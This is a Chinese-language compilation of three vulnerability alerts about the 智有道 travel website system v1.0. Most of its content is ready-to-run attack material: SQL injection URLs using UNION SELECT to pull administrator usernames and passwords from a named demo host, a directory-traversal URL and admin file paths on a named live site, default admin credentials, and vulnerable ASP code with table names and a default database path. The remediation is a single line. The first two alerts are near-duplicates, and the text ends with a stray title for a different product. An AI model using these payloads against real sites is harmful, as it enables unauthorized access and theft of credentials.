智有道专业旅游系统 v1.0 漏洞漏洞预警(精选3篇)
篇1:智有道专业旅游系统 v1.0 漏洞漏洞预警
默认信息:
“智有道”专业旅游网站系统是智有道团队专业开发,针对目前的旅游平台进行强大的功能开发!
后台管理
后台路径:admin/login.asp
管理员:user:admin
密码:psw:123456
下载地址:down.chinaz.com/soft/30295.htm
Demo Url:will2011.w701.hzdemo.cn/
exp:
will2011.w701.hzdemo.cn/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15,16,17 from admin
或者:
will2011.w701.hzdemo.cn/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin
遍历目录:
www.0855.tv/admin/do/admin_uploadfile.asp?id=1&dir=../..
其它:
www.0855.tv/admin/do/Admin_Style.asp
www.0855.tv/admin/do/data.asp
关键字:
为防批量,特略,
智有道专业旅游系统 v1.0 漏洞漏洞预警
,
篇2:智有道专业旅游系统 v1.0 漏洞漏洞预警
“智有道”专业旅游网站系统是智有道团队专业开发,针对目前的旅游平台进行强大的功能开发!
后台管理
后台路径:admin/login.asp
管理员:user:admin
密码:psw:123456
下载地址:down.chinaz.com/soft/30295.htm
Demo Url:will.w701.hzdemo.cn/
exp:
will2011.w701.hzdemo.cn/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15,16,17 from admin
或者:
will2011.w701.hzdemo.cn/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin
遍历目录:
www.0855.tv/admin/do/admin_uploadfile.asp?id=1&dir=../..
其它:
www.0855.tv/admin/do/Admin_Style.asp
www.0855.tv/admin/do/data.asp
关键字:
为防批量,特略,
智有道专业旅游系统 v1.0 漏洞漏洞预警
篇3:智有道专业旅游系统 v1.0 漏洞漏洞预警
Blog:www.hi.baidu.com/alonecode
1)注入漏洞:
漏洞文件:new_list.asp:
bid = trim(request(“bid”))
sid = trim(request(“sid”))
…
if bid“” then
bwhere = “ and bigid=”& bid &“”
else
bwhere = “”
end if
if sid“” then
swhere = “ and smallid=”& sid &“”
else
swhere = “”
end if
idsql=“select * from lxscms_n where shenhe=1”& bwhere & swhere &“ order by id desc”
表名:lxscms_u字段:qwbmuname,qwbmupwds
默认后台:/admin
2)数据库默认地址:
/admin/#a&_as12=b.as.mdb
修复:new_list.asp页面过滤参数输入,
仙游旅行社管理系统v1.0漏洞及修复漏洞预警
,